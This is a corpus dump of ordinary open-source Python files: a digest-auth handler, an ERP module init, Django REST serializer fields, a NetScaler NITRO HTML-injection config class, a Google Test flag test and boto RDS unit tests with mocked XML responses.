def __call__(self, r):
# Initialize per-thread state, if needed
self.init_per_thread_state()
# If we have a saved nonce, skip the 401
if self._thread_local.last_nonce:
r.headers['Authorization'] = self.build_digest_header(r.method, r.url)
try:
self._thread_local.pos = r.body.tell()
except AttributeError:
# In the case of HTTPDigestAuth being reused and the body of
# the previous request was a file-like object, pos has the
# file position of the previous body. Ensure it's set to
# None.
self._thread_local.pos = None
r.register_hook('response', self.handle_401)
r.register_hook('response', self.handle_redirect)
self._thread_local.num_401_calls = 1
return r
def __eq__(self, other):
return all([
self.username == getattr(other, 'username', None),
self.password == getattr(other, 'password', None)
])
def __ne__(self, other):
return not self == other
| apache-2.0 |
iw3hxn/LibrERP | crm_lead_correct/__init__.py | 1 | 1436 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2013 Didotech SRL (info at didotech.com)
# All Rights Reserved.
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
from . import models
from . import report
from . import wizard
| agpl-3.0 |
elberthcabrales/ava | rest_extensions/relations.py | 2 | 1956 | from operator import attrgetter
from rest_framework.reverse import reverse
from rest_framework import serializers
class HyperlinkedNestedIdentityField(serializers.HyperlinkedIdentityField):
def __init__(self, view_name=None, additional_reverse_kwargs={}, **kwargs):
self.additional_reverse_kwargs = additional_reverse_kwargs
super(HyperlinkedNestedIdentityField, self).__init__(view_name, **kwargs)
def get_url(self, obj, view_name, request, format):
if obj.pk is None:
return None
kwargs = {}
for key, value in self.additional_reverse_kwargs.items():
kwargs[key] = getattr(obj, value, value)
kwargs.update({self.lookup_url_kwarg: getattr(obj, self.lookup_field)})
return self.reverse(view_name, kwargs=kwargs, request=request, format=format)
class HyperlinkedNestedRelatedField(serializers.HyperlinkedRelatedField):
def __init__(self, view_name=None, additional_reverse_kwargs={}, **kwargs):
self.additional_reverse_kwargs = additional_reverse_kwargs
super(HyperlinkedNestedRelatedField, self).__init__(view_name, **kwargs)
def to_representation(self, value):
request = self.context.get('request', None)
format = self.context.get('format', None)
return self.get_url(value, self.view_name, request, format)
def get_url(self, obj, view_name, request, format):
"""
Given an object, returh the URL that hyperlinks to the object
May raise a `NoReverseMatch` if the `view_name` and `lookup_field`
attributes are not configured to correctly match the URL conf.
"""
kwargs = {}
for key, value in self.additional_reverse_kwargs.items():
kwargs[key] = getattr(obj, value, None)
kwargs.update({self.lookup_url_kwarg: attrgetter(self.lookup_field)(obj)})
return self.reverse(view_name, kwargs=kwargs, request=request, format=format)
| gpl-3.0 |
benfinke/ns_python | build/lib/nssrc/com/citrix/netscaler/nitro/resource/config/filter/filterprebodyinjection.py | 3 | 4016 | #
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class filterprebodyinjection(base_resource) :
""" Configuration for HTML Injection prebody resource. """
def __init__(self) :
self._prebody = ""
self._systemiid = ""
@property
def prebody(self) :
ur"""Name of file whose contents are to be inserted before the response body.<br/>Minimum length = 1.
"""
try :
return self._prebody
except Exception as e:
raise e
@prebody.setter
def prebody(self, prebody) :
ur"""Name of file whose contents are to be inserted before the response body.<br/>Minimum length = 1
"""
try :
self._prebody = prebody
except Exception as e:
raise e
@property
def systemiid(self) :
ur"""The system IID of the current NetScaler system.
"""
try :
return self._systemiid
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
ur""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(filterprebodyinjection_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.filterprebodyinjection
except Exception as e :
raise e
def _get_object_name(self) :
ur""" Returns the value of object identifier argument
"""
try :
return 0
except Exception as e :
raise e
@classmethod
def update(cls, client, resource) :
ur""" Use this API to update filterprebodyinjection.
"""
try :
if type(resource) is not list :
updateresource = filterprebodyinjection()
updateresource.prebody = resource.prebody
return updateresource.update_resource(client)
except Exception as e :
raise e
@classmethod
def unset(cls, client, resource, args) :
ur""" Use this API to unset the properties of filterprebodyinjection resource.
Properties that need to be unset are specified in args array.
"""
try :
if type(resource) is not list :
unsetresource = filterprebodyinjection()
return unsetresource.unset_resource(client, args)
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
ur""" Use this API to fetch all the filterprebodyinjection resources that are configured on netscaler.
"""
try :
if not name :
obj = filterprebodyinjection()
response = obj.get_resources(client, option_)
return response
except Exception as e :
raise e
class filterprebodyinjection_response(base_response) :
def __init__(self, length=1) :
self.filterprebodyinjection = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.filterprebodyinjection = [filterprebodyinjection() for _ in range(length)]
| apache-2.0 |
cs-au-dk/Artemis | WebKit/Source/ThirdParty/gtest/test/gtest_list_tests_unittest.py | 1068 | 5415 | #!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for Google Test's --gtest_list_tests flag.
A user can ask Google Test to list all tests by specifying the
--gtest_list_tests flag. This script tests such functionality
by invoking gtest_list_tests_unittest_ (a program written with
Google Test) the command line flags.
"""
__author__ = 'phanna@google.com (Patrick Hanna)'
import gtest_test_utils
# Constants.
# The command line flag for enabling/disabling listing all tests.
LIST_TESTS_FLAG = 'gtest_list_tests'
# Path to the gtest_list_tests_unittest_ program.
EXE_PATH = gtest_test_utils.GetTestExecutablePath('gtest_list_tests_unittest_')
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests
EXPECTED_OUTPUT_NO_FILTER = """FooDeathTest.
Test1
Foo.
Bar1
Bar2
DISABLED_Bar3
Abc.
Xyz
Def
FooBar.
Baz
FooTest.
Test1
DISABLED_Test2
Test3
"""
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests and --gtest_filter=Foo*.
EXPECTED_OUTPUT_FILTER_FOO = """FooDeathTest.
Test1
Foo.
Bar1
Bar2
DISABLED_Bar3
FooBar.
Baz
FooTest.
Test1
DISABLED_Test2
Test3
"""
# Utilities.
def Run(args):
"""Runs gtest_list_tests_unittest_ and returns the list of tests printed."""
return gtest_test_utils.Subprocess([EXE_PATH] + args,
capture_stderr=False).output
# The unit test.
class GTestListTestsUnitTest(gtest_test_utils.TestCase):
"""Tests using the --gtest_list_tests flag to list all tests."""
def RunAndVerify(self, flag_value, expected_output, other_flag):
"""Runs gtest_list_tests_unittest_ and verifies that it prints
the correct tests.
Args:
flag_value: value of the --gtest_list_tests flag;
None if the flag should not be present.
expected_output: the expected output after running command;
other_flag: a different flag to be passed to command
along with gtest_list_tests;
None if the flag should not be present.
"""
if flag_value is None:
flag = ''
flag_expression = 'not set'
elif flag_value == '0':
flag = '--%s=0' % LIST_TESTS_FLAG
flag_expression = '0'
else:
flag = '--%s' % LIST_TESTS_FLAG
flag_expression = '1'
args = [flag]
if other_flag is not None:
args += [other_flag]
output = Run(args)
msg = ('when %s is %s, the output of "%s" is "%s".' %
(LIST_TESTS_FLAG, flag_expression, ' '.join(args), output))
if expected_output is not None:
self.assert_(output == expected_output, msg)
else:
self.assert_(output != EXPECTED_OUTPUT_NO_FILTER, msg)
def testDefaultBehavior(self):
"""Tests the behavior of the default mode."""
self.RunAndVerify(flag_value=None,
expected_output=None,
other_flag=None)
def testFlag(self):
"""Tests using the --gtest_list_tests flag."""
self.RunAndVerify(flag_value='0',
expected_output=None,
other_flag=None)
self.RunAndVerify(flag_value='1',
expected_output=EXPECTED_OUTPUT_NO_FILTER,
other_flag=None)
def testOverrideNonFilterFlags(self):
"""Tests that --gtest_list_tests overrides the non-filter flags."""
self.RunAndVerify(flag_value='1',
expected_output=EXPECTED_OUTPUT_NO_FILTER,
other_flag='--gtest_break_on_failure')
def testWithFilterFlags(self):
"""Tests that --gtest_list_tests takes into account the
--gtest_filter flag."""
self.RunAndVerify(flag_value='1',
expected_output=EXPECTED_OUTPUT_FILTER_FOO,
other_flag='--gtest_filter=Foo*')
if __name__ == '__main__':
gtest_test_utils.Main()
| gpl-3.0 |
IsCoolEntertainment/debpkg_python-boto | tests/unit/rds/test_connection.py | 1 | 30456 | #!/usr/bin/env python
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from tests.unit import unittest
from tests.unit import AWSMockServiceTestCase
from boto.ec2.securitygroup import SecurityGroup
from boto.rds import RDSConnection
from boto.rds.vpcsecuritygroupmembership import VPCSecurityGroupMembership
from boto.rds.parametergroup import ParameterGroup
from boto.rds.logfile import LogFile
class TestRDSConnection(AWSMockServiceTestCase):
connection_class = RDSConnection
def setUp(self):
super(TestRDSConnection, self).setUp()
def default_body(self):
return """
<DescribeDBInstancesResponse>
<DescribeDBInstancesResult>
<DBInstances>
<DBInstance>
<Iops>2000</Iops>
<BackupRetentionPeriod>1</BackupRetentionPeriod>
<MultiAZ>false</MultiAZ>
<DBInstanceStatus>backing-up</DBInstanceStatus>
<DBInstanceIdentifier>mydbinstance2</DBInstanceIdentifier>
<PreferredBackupWindow>10:30-11:00</PreferredBackupWindow>
<PreferredMaintenanceWindow>wed:06:30-wed:07:00</PreferredMaintenanceWindow>
<OptionGroupMembership>
<OptionGroupName>default:mysql-5-5</OptionGroupName>
<Status>in-sync</Status>
</OptionGroupMembership>
<AvailabilityZone>us-west-2b</AvailabilityZone>
<ReadReplicaDBInstanceIdentifiers/>
<Engine>mysql</Engine>
<PendingModifiedValues/>
<LicenseModel>general-public-license</LicenseModel>
<DBParameterGroups>
<DBParameterGroup>
<ParameterApplyStatus>in-sync</ParameterApplyStatus>
<DBParameterGroupName>default.mysql5.5</DBParameterGroupName>
</DBParameterGroup>
</DBParameterGroups>
<Endpoint>
<Port>3306</Port>
<Address>mydbinstance2.c0hjqouvn9mf.us-west-2.rds.amazonaws.com</Address>
</Endpoint>
<EngineVersion>5.5.27</EngineVersion>
<DBSecurityGroups>
<DBSecurityGroup>
<Status>active</Status>
<DBSecurityGroupName>default</DBSecurityGroupName>
</DBSecurityGroup>
</DBSecurityGroups>
<VpcSecurityGroups>
<VpcSecurityGroupMembership>
<VpcSecurityGroupId>sg-1</VpcSecurityGroupId>
<Status>active</Status>
</VpcSecurityGroupMembership>
</VpcSecurityGroups>
<DBName>mydb2</DBName>
<AutoMinorVersionUpgrade>true</AutoMinorVersionUpgrade>
<InstanceCreateTime>2012-10-03T22:01:51.047Z</InstanceCreateTime>
<AllocatedStorage>200</AllocatedStorage>
<DBInstanceClass>db.m1.large</DBInstanceClass>
<MasterUsername>awsuser</MasterUsername>
<StatusInfos>
<DBInstanceStatusInfo>
<Message></Message>
<Normal>true</Normal>
<Status>replicating</Status>
<StatusType>read replication</StatusType>
</DBInstanceStatusInfo>
</StatusInfos>
<DBSubnetGroup>
<VpcId>990524496922</VpcId>
<SubnetGroupStatus>Complete</SubnetGroupStatus>
<DBSubnetGroupDescription>My modified DBSubnetGroup</DBSubnetGroupDescription>
<DBSubnetGroupName>mydbsubnetgroup</DBSubnetGroupName>
<Subnets>
<Subnet>
<SubnetStatus>Active</SubnetStatus>
<SubnetIdentifier>subnet-7c5b4115</SubnetIdentifier>
<SubnetAvailabilityZone>
<Name>us-east-1c</Name>
</SubnetAvailabilityZone>
</Subnet>
<Subnet>
<SubnetStatus>Active</SubnetStatus>
<SubnetIdentifier>subnet-7b5b4112</SubnetIdentifier>
<SubnetAvailabilityZone>
<Name>us-east-1b</Name>
</SubnetAvailabilityZone>
</Subnet>
<Subnet>
<SubnetStatus>Active</SubnetStatus>
<SubnetIdentifier>subnet-3ea6bd57</SubnetIdentifier>
<SubnetAvailabilityZone>
<Name>us-east-1d</Name>
</SubnetAvailabilityZone>
</Subnet>
</Subnets>
</DBSubnetGroup>
</DBInstance>
</DBInstances>
</DescribeDBInstancesResult>
</DescribeDBInstancesResponse>
"""
def test_get_all_db_instances(self):
self.set_http_response(status_code=200)
response = self.service_connection.get_all_dbinstances('instance_id')
self.assertEqual(len(response), 1)
self.assert_request_parameters({
'Action': 'DescribeDBInstances',
'DBInstanceIdentifier': 'instance_id',
}, ignore_params_values=['Version'])
db = response[0]
self.assertEqual(db.id, 'mydbinstance2')
self.assertEqual(db.create_time, '2012-10-03T22:01:51.047Z')
self.assertEqual(db.engine, 'mysql')
self.assertEqual(db.status, 'backing-up')
self.assertEqual(db.allocated_storage, 200)
self.assertEqual(
db.endpoint,
(u'mydbinstance2.c0hjqouvn9mf.us-west-2.rds.amazonaws.com', 3306))
self.assertEqual(db.instance_class, 'db.m1.large')
self.assertEqual(db.master_username, 'awsuser')
self.assertEqual(db.availability_zone, 'us-west-2b')
self.assertEqual(db.backup_retention_period, 1)
self.assertEqual(db.preferred_backup_window, '10:30-11:00')
self.assertEqual(db.preferred_maintenance_window,
'wed:06:30-wed:07:00')
self.assertEqual(db.latest_restorable_time, None)
self.assertEqual(db.multi_az, False)
self.assertEqual(db.iops, 2000)
self.assertEqual(db.pending_modified_values, {})
self.assertEqual(db.parameter_group.name,
'default.mysql5.5')
self.assertEqual(db.parameter_group.description, None)
self.assertEqual(db.parameter_group.engine, None)
self.assertEqual(db.security_group.owner_id, None)
self.assertEqual(db.security_group.name, 'default')
self.assertEqual(db.security_group.description, None)
self.assertEqual(db.security_group.ec2_groups, [])
self.assertEqual(db.security_group.ip_ranges, [])
self.assertEqual(len(db.status_infos), 1)
self.assertEqual(db.status_infos[0].message, '')
self.assertEqual(db.status_infos[0].normal, True)
self.assertEqual(db.status_infos[0].status, 'replicating')
self.assertEqual(db.status_infos[0].status_type, 'read replication')
self.assertEqual(db.vpc_security_groups[0].status, 'active')
self.assertEqual(db.vpc_security_groups[0].vpc_group, 'sg-1')
self.assertEqual(db.license_model, 'general-public-license')
self.assertEqual(db.engine_version, '5.5.27')
self.assertEqual(db.auto_minor_version_upgrade, True)
self.assertEqual(db.subnet_group.name, 'mydbsubnetgroup')
class TestRDSCCreateDBInstance(AWSMockServiceTestCase):
connection_class = RDSConnection
def setUp(self):
super(TestRDSCCreateDBInstance, self).setUp()
def default_body(self):
return """
<CreateDBInstanceResponse xmlns="http://rds.amazonaws.com/doc/2013-05-15/">
<CreateDBInstanceResult>
<DBInstance>
<ReadReplicaDBInstanceIdentifiers/>
<Engine>mysql</Engine>
<PendingModifiedValues>
<MasterUserPassword>****</MasterUserPassword>
</PendingModifiedValues>
<BackupRetentionPeriod>0</BackupRetentionPeriod>
<MultiAZ>false</MultiAZ>
<LicenseModel>general-public-license</LicenseModel>
<DBSubnetGroup>
<VpcId>990524496922</VpcId>
<SubnetGroupStatus>Complete</SubnetGroupStatus>
<DBSubnetGroupDescription>description</DBSubnetGroupDescription>
<DBSubnetGroupName>subnet_grp1</DBSubnetGroupName>
<Subnets>
<Subnet>
<SubnetStatus>Active</SubnetStatus>
<SubnetIdentifier>subnet-7c5b4115</SubnetIdentifier>
<SubnetAvailabilityZone>
<Name>us-east-1c</Name>
</SubnetAvailabilityZone>
</Subnet>
<Subnet>
<SubnetStatus>Active</SubnetStatus>
<SubnetIdentifier>subnet-7b5b4112</SubnetIdentifier>
<SubnetAvailabilityZone>
<Name>us-east-1b</Name>
</SubnetAvailabilityZone>
</Subnet>
<Subnet>
<SubnetStatus>Active</SubnetStatus>
<SubnetIdentifier>subnet-3ea6bd57</SubnetIdentifier>
<SubnetAvailabilityZone>
<Name>us-east-1d</Name>
</SubnetAvailabilityZone>
</Subnet>
</Subnets>
</DBSubnetGroup>
<DBInstanceStatus>creating</DBInstanceStatus>
<EngineVersion>5.1.50</EngineVersion>
<DBInstanceIdentifier>simcoprod01</DBInstanceIdentifier>
<DBParameterGroups>
<DBParameterGroup>
<ParameterApplyStatus>in-sync</ParameterApplyStatus>
<DBParameterGroupName>default.mysql5.1</DBParameterGroupName>
</DBParameterGroup>
</DBParameterGroups>
<DBSecurityGroups>
<DBSecurityGroup>
<Status>active</Status>
<DBSecurityGroupName>default</DBSecurityGroupName>
</DBSecurityGroup>
</DBSecurityGroups>
<PreferredBackupWindow>00:00-00:30</PreferredBackupWindow>
<AutoMinorVersionUpgrade>true</AutoMinorVersionUpgrade>
<PreferredMaintenanceWindow>sat:07:30-sat:08:00</PreferredMaintenanceWindow>
<AllocatedStorage>10</AllocatedStorage>
<DBInstanceClass>db.m1.large</DBInstanceClass>
<MasterUsername>master</MasterUsername>
</DBInstance>
</CreateDBInstanceResult>
<ResponseMetadata>
<RequestId>2e5d4270-8501-11e0-bd9b-a7b1ece36d51</RequestId>
</ResponseMetadata>
</CreateDBInstanceResponse>
"""
def test_create_db_instance_param_group_name(self):
self.set_http_response(status_code=200)
db = self.service_connection.create_dbinstance(
'SimCoProd01',
10,
'db.m1.large',
'master',
'Password01',
param_group='default.mysql5.1',
db_subnet_group_name='dbSubnetgroup01',
backup_retention_period=0)
self.assert_request_parameters({
'Action': 'CreateDBInstance',
'AllocatedStorage': 10,
'AutoMinorVersionUpgrade': 'true',
'BackupRetentionPeriod': 0,
'DBInstanceClass': 'db.m1.large',
'DBInstanceIdentifier': 'SimCoProd01',
'DBParameterGroupName': 'default.mysql5.1',
'DBSubnetGroupName': 'dbSubnetgroup01',
'Engine': 'MySQL5.1',
'MasterUsername': 'master',
'MasterUserPassword': 'Password01',
'Port': 3306
}, ignore_params_values=['Version'])
self.assertEqual(db.id, 'simcoprod01')
self.assertEqual(db.engine, 'mysql')
self.assertEqual(db.status, 'creating')
self.assertEqual(db.allocated_storage, 10)
self.assertEqual(db.instance_class, 'db.m1.large')
self.assertEqual(db.master_username, 'master')
self.assertEqual(db.multi_az, False)
self.assertEqual(db.pending_modified_values,
{'MasterUserPassword': '****'})
self.assertEqual(db.parameter_group.name,
'default.mysql5.1')
self.assertEqual(db.parameter_group.description, None)
self.assertEqual(db.parameter_group.engine, None)
self.assertEqual(db.backup_retention_period, 0)
def test_create_db_instance_param_group_instance(self):
self.set_http_response(status_code=200)
param_group = ParameterGroup()
param_group.name = 'default.mysql5.1'
db = self.service_connection.create_dbinstance(
'SimCoProd01',
10,
'db.m1.large',
'master',
'Password01',
param_group=param_group,
db_subnet_group_name='dbSubnetgroup01')
self.assert_request_parameters({
'Action': 'CreateDBInstance',
'AllocatedStorage': 10,
'AutoMinorVersionUpgrade': 'true',
'DBInstanceClass': 'db.m1.large',
'DBInstanceIdentifier': 'SimCoProd01',
'DBParameterGroupName': 'default.mysql5.1',
'DBSubnetGroupName': 'dbSubnetgroup01',
'Engine': 'MySQL5.1',
'MasterUsername': 'master',
'MasterUserPassword': 'Password01',
'Port': 3306,
}, ignore_params_values=['Version'])
self.assertEqual(db.id, 'simcoprod01')
self.assertEqual(db.engine, 'mysql')
self.assertEqual(db.status, 'creating')
self.assertEqual(db.allocated_storage, 10)
self.assertEqual(db.instance_class, 'db.m1.large')
self.assertEqual(db.master_username, 'master')
self.assertEqual(db.multi_az, False)
self.assertEqual(db.pending_modified_values,
{'MasterUserPassword': '****'})
self.assertEqual(db.parameter_group.name,
'default.mysql5.1')
self.assertEqual(db.parameter_group.description, None)
self.assertEqual(db.parameter_group.engine, None)
class TestRDSConnectionRestoreDBInstanceFromPointInTime(AWSMockServiceTestCase):
connection_class = RDSConnection
def setUp(self):
super(TestRDSConnectionRestoreDBInstanceFromPointInTime, self).setUp()
def default_body(self):
return """
<RestoreDBInstanceToPointInTimeResponse xmlns="http://rds.amazonaws.com/doc/2013-05-15/">
<RestoreDBInstanceToPointInTimeResult>
<DBInstance>
<ReadReplicaDBInstanceIdentifiers/>
<Engine>mysql</Engine>
<PendingModifiedValues/>
<BackupRetentionPeriod>1</BackupRetentionPeriod>
<MultiAZ>false</MultiAZ>
<LicenseModel>general-public-license</LicenseModel>
<DBInstanceStatus>creating</DBInstanceStatus>
<EngineVersion>5.1.50</EngineVersion>
<DBInstanceIdentifier>restored-db</DBInstanceIdentifier>
<DBParameterGroups>
<DBParameterGroup>
<ParameterApplyStatus>in-sync</ParameterApplyStatus>
<DBParameterGroupName>default.mysql5.1</DBParameterGroupName>
</DBParameterGroup>
</DBParameterGroups>
<DBSecurityGroups>
<DBSecurityGroup>
<Status>active</Status>
<DBSecurityGroupName>default</DBSecurityGroupName>
</DBSecurityGroup>
</DBSecurityGroups>
<PreferredBackupWindow>00:00-00:30</PreferredBackupWindow>
<AutoMinorVersionUpgrade>true</AutoMinorVersionUpgrade>
<PreferredMaintenanceWindow>sat:07:30-sat:08:00</PreferredMaintenanceWindow>
<AllocatedStorage>10</AllocatedStorage>
<DBInstanceClass>db.m1.large</DBInstanceClass>
<MasterUsername>master</MasterUsername>
</DBInstance>
</RestoreDBInstanceToPointInTimeResult>
<ResponseMetadata>
<RequestId>1ef546bc-850b-11e0-90aa-eb648410240d</RequestId>
</ResponseMetadata>
</RestoreDBInstanceToPointInTimeResponse>
"""
def test_restore_dbinstance_from_point_in_time(self):
self.set_http_response(status_code=200)
db = self.service_connection.restore_dbinstance_from_point_in_time(
'simcoprod01',
'restored-db',
True)
self.assert_request_parameters({
'Action': 'RestoreDBInstanceToPointInTime',
'SourceDBInstanceIdentifier': 'simcoprod01',
'TargetDBInstanceIdentifier': 'restored-db',
'UseLatestRestorableTime': 'true',
}, ignore_params_values=['Version'])
self.assertEqual(db.id, 'restored-db')
self.assertEqual(db.engine, 'mysql')
self.assertEqual(db.status, 'creating')
self.assertEqual(db.allocated_storage, 10)
self.assertEqual(db.instance_class, 'db.m1.large')
self.assertEqual(db.master_username, 'master')
self.assertEqual(db.multi_az, False)
self.assertEqual(db.parameter_group.name,
'default.mysql5.1')
self.assertEqual(db.parameter_group.description, None)
self.assertEqual(db.parameter_group.engine, None)
def test_restore_dbinstance_from_point_in_time__db_subnet_group_name(self):
self.set_http_response(status_code=200)
db = self.service_connection.restore_dbinstance_from_point_in_time(
'simcoprod01',
'restored-db',
True,
db_subnet_group_name='dbsubnetgroup')
self.assert_request_parameters({
'Action': 'RestoreDBInstanceToPointInTime',
'SourceDBInstanceIdentifier': 'simcoprod01',
'TargetDBInstanceIdentifier': 'restored-db',
'UseLatestRestorableTime': 'true',
'DBSubnetGroupName': 'dbsubnetgroup',
}, ignore_params_values=['Version'])
def test_create_db_instance_vpc_sg_str(self):
self.set_http_response(status_code=200)
vpc_security_groups = [
VPCSecurityGroupMembership(self.service_connection, 'active', 'sg-1'),
VPCSecurityGroupMembership(self.service_connection, None, 'sg-2')]
db = self.service_connection.create_dbinstance(
'SimCoProd01',
10,
'db.m1.large',
'master',
'Password01',
param_group='default.mysql5.1',
db_subnet_group_name='dbSubnetgroup01',
vpc_security_groups=vpc_security_groups)
self.assert_request_parameters({
'Action': 'CreateDBInstance',
'AllocatedStorage': 10,
'AutoMinorVersionUpgrade': 'true',
'DBInstanceClass': 'db.m1.large',
'DBInstanceIdentifier': 'SimCoProd01',
'DBParameterGroupName': 'default.mysql5.1',
'DBSubnetGroupName': 'dbSubnetgroup01',
'Engine': 'MySQL5.1',
'MasterUsername': 'master',
'MasterUserPassword': 'Password01',
'Port': 3306,
'VpcSecurityGroupIds.member.1': 'sg-1',
'VpcSecurityGroupIds.member.2': 'sg-2'
}, ignore_params_values=['Version'])
def test_create_db_instance_vpc_sg_obj(self):
self.set_http_response(status_code=200)
sg1 = SecurityGroup(name='sg-1')
sg2 = SecurityGroup(name='sg-2')
vpc_security_groups = [
VPCSecurityGroupMembership(self.service_connection, 'active', sg1.name),
VPCSecurityGroupMembership(self.service_connection, None, sg2.name)]
db = self.service_connection.create_dbinstance(
'SimCoProd01',
10,
'db.m1.large',
'master',
'Password01',
param_group='default.mysql5.1',
db_subnet_group_name='dbSubnetgroup01',
vpc_security_groups=vpc_security_groups)
self.assert_request_parameters({
'Action': 'CreateDBInstance',
'AllocatedStorage': 10,
'AutoMinorVersionUpgrade': 'true',
'DBInstanceClass': 'db.m1.large',
'DBInstanceIdentifier': 'SimCoProd01',
'DBParameterGroupName': 'default.mysql5.1',
'DBSubnetGroupName': 'dbSubnetgroup01',
'Engine': 'MySQL5.1',
'MasterUsername': 'master',
'MasterUserPassword': 'Password01',
'Port': 3306,
'VpcSecurityGroupIds.member.1': 'sg-1',
'VpcSecurityGroupIds.member.2': 'sg-2'
}, ignore_params_values=['Version'])
class TestRDSOptionGroups(AWSMockServiceTestCase):
connection_class = RDSConnection
def setUp(self):
super(TestRDSOptionGroups, self).setUp()
def default_body(self):
return """
<DescribeOptionGroupsResponse xmlns="http://rds.amazonaws.com/doc/2013-05-15/">
<DescribeOptionGroupsResult>
<OptionGroupsList>
<OptionGroup>
<MajorEngineVersion>11.2</MajorEngineVersion>
<OptionGroupName>myoptiongroup</OptionGroupName>
<EngineName>oracle-se1</EngineName>
<OptionGroupDescription>Test option group</OptionGroupDescription>
<Options/>
</OptionGroup>
<OptionGroup>
<MajorEngineVersion>11.2</MajorEngineVersion>
<OptionGroupName>default:oracle-se1-11-2</OptionGroupName>
<EngineName>oracle-se1</EngineName>
<OptionGroupDescription>Default Option Group.</OptionGroupDescription>
<Options/>
</OptionGroup>
</OptionGroupsList>
</DescribeOptionGroupsResult>
<ResponseMetadata>
<RequestId>e4b234d9-84d5-11e1-87a6-71059839a52b</RequestId>
</ResponseMetadata>
</DescribeOptionGroupsResponse>
"""
def test_describe_option_groups(self):
self.set_http_response(status_code=200)
response = self.service_connection.describe_option_groups()
self.assertEqual(len(response), 2)
options = response[0]
self.assertEqual(options.name, 'myoptiongroup')
self.assertEqual(options.description, 'Test option group')
self.assertEqual(options.engine_name, 'oracle-se1')
self.assertEqual(options.major_engine_version, '11.2')
options = response[1]
self.assertEqual(options.name, 'default:oracle-se1-11-2')
self.assertEqual(options.description, 'Default Option Group.')
self.assertEqual(options.engine_name, 'oracle-se1')
self.assertEqual(options.major_engine_version, '11.2')
class TestRDSLogFile(AWSMockServiceTestCase):
connection_class = RDSConnection
def setUp(self):
super(TestRDSLogFile, self).setUp()
